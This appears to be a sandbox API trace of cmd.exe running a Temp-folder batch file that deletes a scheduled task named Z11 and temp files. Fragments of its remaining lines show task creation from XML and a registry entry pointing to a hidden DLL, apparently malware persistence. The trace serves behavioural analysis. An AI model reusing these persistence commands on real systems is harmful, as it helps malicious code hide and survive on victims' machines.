[0379.705] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x218f70
[0379.705] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x218f70, Size=0x1d0) returned 0x218f70
[0379.705] GetProcessHeap () returned 0x200000
[0379.706] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x218f70) returned 0x1d0
[0379.706] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0379.706] GetProcessHeap () returned 0x200000
[0379.706] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x201d70
[0379.706] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x7e) returned 0x201d70
[0379.706] GetProcessHeap () returned 0x200000
[0379.706] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x7e
[0379.706] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0379.706] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*" (normalized: "c:\\windows\\system32\\schtasks.*"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0x21f4a0
[0379.707] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0379.707] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM" (normalized: "c:\\windows\\system32\\schtasks.com"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0xffffffffffffffff
[0379.707] GetLastError () returned 0x2
[0379.707] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE" (normalized: "c:\\windows\\system32\\schtasks.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ef0b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0b0) returned 0x21f4a0
[0379.707] FindClose (in: hFindFile=0x21f4a0 | out: hFindFile=0x21f4a0) returned 1
[0379.708] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0379.708] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0379.708] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0379.708] SetErrorMode (uMode=0x0) returned 0x0
[0379.708] SetErrorMode (uMode=0x1) returned 0x0
[0379.709] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x219160, lpFilePart=0x1eeb90 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1eeb90*="system32") returned 0x13
[0379.709] SetErrorMode (uMode=0x0) returned 0x1
[0379.709] GetProcessHeap () returned 0x200000
[0379.709] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x219150, Size=0x4a) returned 0x219150
[0379.709] GetProcessHeap () returned 0x200000
[0379.709] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x219150) returned 0x4a
[0379.709] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0379.709] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0379.709] GetProcessHeap () returned 0x200000
[0379.709] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1ce) returned 0x22b5e0
[0379.709] GetProcessHeap () returned 0x200000
[0379.710] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x38c) returned 0x2191b0
[0379.710] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x2191b0, Size=0x1d0) returned 0x2191b0
[0379.710] GetProcessHeap () returned 0x200000
[0379.710] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x2191b0) returned 0x1d0
[0379.710] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0379.710] GetProcessHeap () returned 0x200000
[0379.710] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xe8) returned 0x220470
[0379.710] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x7e) returned 0x220470
[0379.710] GetProcessHeap () returned 0x200000
[0379.710] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x7e
[0379.710] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0379.710] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*" (normalized: "c:\\windows\\system32\\schtasks.*"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0x21f500
[0379.711] FindClose (in: hFindFile=0x21f500 | out: hFindFile=0x21f500) returned 1
[0379.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM" (normalized: "c:\\windows\\system32\\schtasks.com"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0xffffffffffffffff
[0379.711] GetLastError () returned 0x2
[0379.711] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE" (normalized: "c:\\windows\\system32\\schtasks.exe"), fInfoLevelId=0x1, lpFindFileData=0x1ee900, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ee900) returned 0x21f500
[0379.712] FindClose (in: hFindFile=0x21f500 | out: hFindFile=0x21f500) returned 1
[0379.712] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0379.712] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0379.712] GetConsoleTitleW (in: lpConsoleTitle=0x1eee50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0379.712] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eec08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eebc8 | out: lpAttributeList=0x1eec08, lpSize=0x1eebc8) returned 1
[0379.712] UpdateProcThreadAttribute (in: lpAttributeList=0x1eec08, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eebb8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eec08, lpPreviousValue=0x0) returned 1
[0379.712] GetStartupInfoW (in: lpStartupInfo=0x1eed20 | out: lpStartupInfo=0x1eed20*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0379.713] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1
[0379.713] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /Delete /TN \\Z11 /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1eec40*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="schtasks /Delete /TN \\Z11 /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1eebf0 | out: lpCommandLine="schtasks /Delete /TN \\Z11 /f", lpProcessInformation=0x1eebf0*(hProcess=0x64, hThread=0x6c, dwProcessId=0xce4, dwThreadId=0xca4)) returned 1
[0379.720] CloseHandle (hObject=0x6c) returned 1
[0379.720] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0379.720] GetProcessHeap () returned 0x200000
[0379.721] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cc80 | out: hHeap=0x200000) returned 1
[0379.721] GetEnvironmentStringsW () returned 0x22a820*
[0379.721] GetProcessHeap () returned 0x200000
[0379.721] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cbf0
[0379.721] memcpy (in: _Dst=0x21cbf0, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cbf0) returned 0x21cbf0
[0379.721] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0379.721] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0380.798] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x1eeb38 | out: lpExitCode=0x1eeb38*=0x0) returned 1
[0380.798] CloseHandle (hObject=0x64) returned 1
[0380.798] _vsnwprintf (in: _Buffer=0x1eeda8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1eeb48 | out: _Buffer="00000000") returned 8
[0380.798] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0380.798] GetProcessHeap () returned 0x200000
[0380.799] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0380.799] GetEnvironmentStringsW () returned 0x22a820*
[0380.799] GetProcessHeap () returned 0x200000
[0380.799] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cbf0
[0380.799] memcpy (in: _Dst=0x21cbf0, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cbf0) returned 0x21cbf0
[0380.799] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0380.799] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0380.799] GetProcessHeap () returned 0x200000
[0380.799] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cbf0 | out: hHeap=0x200000) returned 1
[0380.800] GetEnvironmentStringsW () returned 0x22a820*
[0380.800] GetProcessHeap () returned 0x200000
[0380.800] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0xb9e) returned 0x21cbf0
[0380.800] memcpy (in: _Dst=0x21cbf0, _Src=0x22a820, _Size=0xb9e | out: _Dst=0x21cbf0) returned 0x21cbf0
[0380.800] FreeEnvironmentStringsW (penv=0x22a820) returned 1
[0380.800] GetProcessHeap () returned 0x200000
[0380.800] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0380.800] DeleteProcThreadAttributeList (in: lpAttributeList=0x1eec08 | out: lpAttributeList=0x1eec08)
[0380.800] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.800] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.801] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.801] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.802] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.802] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.802] SetConsoleInputExeNameW () returned 0x1
[0380.802] GetConsoleOutputCP () returned 0x1b5
[0380.803] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.803] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.803] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.804] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0380.804] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.804] SetFilePointer (in: hFile=0x64, lDistanceToMove=2807, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0380.804] GetProcessHeap () returned 0x200000
[0380.804] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.804] GetProcessHeap () returned 0x200000
[0380.805] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2191b0 | out: hHeap=0x200000) returned 1
[0380.805] GetProcessHeap () returned 0x200000
[0380.805] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b5e0 | out: hHeap=0x200000) returned 1
[0380.805] GetProcessHeap () returned 0x200000
[0380.805] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x219150 | out: hHeap=0x200000) returned 1
[0380.805] GetProcessHeap () returned 0x200000
[0380.805] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.806] GetProcessHeap () returned 0x200000
[0380.806] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.806] GetProcessHeap () returned 0x200000
[0380.806] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0380.806] GetProcessHeap () returned 0x200000
[0380.806] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f70 | out: hHeap=0x200000) returned 1
[0380.806] GetProcessHeap () returned 0x200000
[0380.807] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22b400 | out: hHeap=0x200000) returned 1
[0380.807] GetProcessHeap () returned 0x200000
[0380.807] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.807] GetProcessHeap () returned 0x200000
[0380.807] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x228690 | out: hHeap=0x200000) returned 1
[0380.807] GetProcessHeap () returned 0x200000
[0380.807] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.807] GetProcessHeap () returned 0x200000
[0380.807] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0380.808] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.808] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0380.808] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x43b, lpOverlapped=0x0) returned 1
[0380.808] SetFilePointer (in: hFile=0x64, lDistanceToMove=2829, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0380.808] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%TEMP%\\MMM.TMP\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="Del \"%TEMP%\\MMM.TMP\"\r\nZ11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 22
[0380.808] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.808] GetFileType (hFile=0x64) returned 0x1
[0380.809] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.809] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0380.809] GetProcessHeap () returned 0x200000
[0380.809] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23d3d0
[0380.809] GetProcessHeap () returned 0x200000
[0380.809] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2413f0
[0380.810] GetProcessHeap () returned 0x200000
[0380.810] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x1a) returned 0x21b0c0
[0380.810] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a27f360, nSize=0x2000 | out: lpBuffer="") returned 0x24
[0380.810] GetProcessHeap () returned 0x200000
[0380.810] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.810] GetProcessHeap () returned 0x200000
[0380.810] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2413f0 | out: hHeap=0x200000) returned 1
[0380.810] GetProcessHeap () returned 0x200000
[0380.811] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x23d3d0 | out: hHeap=0x200000) returned 1
[0380.811] _tell (_FileHandle=3) returned 2829
[0380.811] _close (_FileHandle=3) returned 0
[0380.811] _wcsicmp (_String1="Del", _String2="DIR") returned -4
[0380.811] _wcsicmp (_String1="Del", _String2="ERASE") returned -1
[0380.811] _wcsicmp (_String1="Del", _String2="DEL") returned 0
[0380.812] GetConsoleTitleW (in: lpConsoleTitle=0x1ef300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
[0380.813] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x201d70, Size=0x70) returned 0x201d70
[0380.813] GetProcessHeap () returned 0x200000
[0380.813] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x201d70) returned 0x70
[0380.813] RtlReAllocateHeap (Heap=0x200000, Flags=0x0, Ptr=0x220470, Size=0x70) returned 0x220470
[0380.813] GetProcessHeap () returned 0x200000
[0380.813] RtlSizeHeap (HeapHandle=0x200000, Flags=0x0, MemoryPointer=0x220470) returned 0x70
[0380.813] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1eee60 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.813] GetProcessHeap () returned 0x200000
[0380.813] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f4a0
[0380.813] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x1edd70 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.813] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ee880, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ee028*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1
[0380.814] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8
[0380.814] GetProcessHeap () returned 0x200000
[0380.814] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x58) returned 0x21f500
[0380.814] GetProcessHeap () returned 0x200000
[0380.814] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x21d7a0
[0380.814] _wcsicmp (_String1="MMM.TMP", _String2=".") returned 63
[0380.814] _wcsicmp (_String1="MMM.TMP", _String2="..") returned 63
[0380.814] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp")) returned 0x2020
[0380.815] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x201750 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0380.815] SetErrorMode (uMode=0x0) returned 0x0
[0380.815] SetErrorMode (uMode=0x1) returned 0x0
[0380.815] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", nBufferLength=0x104, lpBuffer=0x1edd90, lpFilePart=0x1edd80 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP", lpFilePart=0x1edd80*="MMM.TMP") returned 0x2c
[0380.815] SetErrorMode (uMode=0x0) returned 0x1
[0380.816] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010
[0380.816] GetProcessHeap () returned 0x200000
[0380.816] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x260) returned 0x218f10
[0380.816] _wcsicmp (_String1="MMM.TMP", _String2=".") returned 63
[0380.816] _wcsicmp (_String1="MMM.TMP", _String2="..") returned 63
[0380.816] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp")) returned 0x2020
[0380.816] FindFirstFileExW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp"), fInfoLevelId=0x0, lpFindFileData=0x21dd54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21dd54) returned 0x21f560
[0380.817] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\MMM.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\mmm.tmp")) returned 1
[0380.819] FindNextFileW (in: hFindFile=0x21f560, lpFindFileData=0x21dd54 | out: lpFindFileData=0x21dd54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8bbca60, ftCreationTime.dwHighDateTime=0x1dab598, ftLastAccessTime.dwLowDateTime=0xf8bbca60, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0xf8c08d20, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMM.TMP", cAlternateFileName="")) returned 0
[0380.821] GetLastError () returned 0x12
[0380.821] FindClose (in: hFindFile=0x21f560 | out: hFindFile=0x21f560) returned 1
[0380.821] GetProcessHeap () returned 0x200000
[0380.821] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21dd40 | out: hHeap=0x200000) returned 1
[0380.821] GetProcessHeap () returned 0x200000
[0380.821] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x2204f0 | out: hHeap=0x200000) returned 1
[0380.821] GetProcessHeap () returned 0x200000
[0380.821] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0c0 | out: hHeap=0x200000) returned 1
[0380.821] GetProcessHeap () returned 0x200000
[0380.821] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201df0 | out: hHeap=0x200000) returned 1
[0380.821] GetProcessHeap () returned 0x200000
[0380.822] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x218f10 | out: hHeap=0x200000) returned 1
[0380.822] GetProcessHeap () returned 0x200000
[0380.822] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201740 | out: hHeap=0x200000) returned 1
[0380.822] GetProcessHeap () returned 0x200000
[0380.822] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21d7a0 | out: hHeap=0x200000) returned 1
[0380.822] GetProcessHeap () returned 0x200000
[0380.823] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f500 | out: hHeap=0x200000) returned 1
[0380.823] GetProcessHeap () returned 0x200000
[0380.823] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21f4a0 | out: hHeap=0x200000) returned 1
[0380.823] GetProcessHeap () returned 0x200000
[0380.823] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233500 | out: hHeap=0x200000) returned 1
[0380.823] GetProcessHeap () returned 0x200000
[0380.823] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x220470 | out: hHeap=0x200000) returned 1
[0380.825] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.825] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0380.826] _get_osfhandle (_FileHandle=1) returned 0x7
[0380.826] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0380.826] _get_osfhandle (_FileHandle=0) returned 0x3
[0380.826] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0380.827] SetConsoleInputExeNameW () returned 0x1
[0380.827] GetConsoleOutputCP () returned 0x1b5
[0380.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0380.827] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0380.828] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ef558, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x64
[0380.828] _open_osfhandle (_OSFileHandle=0x64, _Flags=8) returned 3
[0380.828] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.828] SetFilePointer (in: hFile=0x64, lDistanceToMove=2829, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0380.828] GetProcessHeap () returned 0x200000
[0380.828] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233480 | out: hHeap=0x200000) returned 1
[0380.828] GetProcessHeap () returned 0x200000
[0380.829] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x201d70 | out: hHeap=0x200000) returned 1
[0380.829] GetProcessHeap () returned 0x200000
[0380.829] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x233400 | out: hHeap=0x200000) returned 1
[0380.829] GetProcessHeap () returned 0x200000
[0380.829] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x22a3f0 | out: hHeap=0x200000) returned 1
[0380.829] GetProcessHeap () returned 0x200000
[0380.829] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x235400 | out: hHeap=0x200000) returned 1
[0380.829] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.830] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0380.830] ReadFile (in: hFile=0x64, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1ef360, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ef360*=0x425, lpOverlapped=0x0) returned 1
[0380.830] SetFilePointer (in: hFile=0x64, lDistanceToMove=2851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0380.830] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%TEMP%\\TTT.TMP\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr="Del \"%TEMP%\\TTT.TMP\"\r\nZ11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n %temp%\\a.xml\r\nG_SZ /d \"%LOCALAPPDATA%\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL\" /f\r\n") returned 22
[0380.830] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.830] GetFileType (hFile=0x64) returned 0x1
[0380.830] _get_osfhandle (_FileHandle=3) returned 0x64
[0380.830] SetFilePointer (in: hFile=0x64, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0380.831] GetProcessHeap () returned 0x200000
[0380.831] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x23d3d0
[0380.831] GetProcessHeap () returned 0x200000
[0380.831] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4010) returned 0x2413f0
[0380.831] GetProcessHeap () returned 0x200000
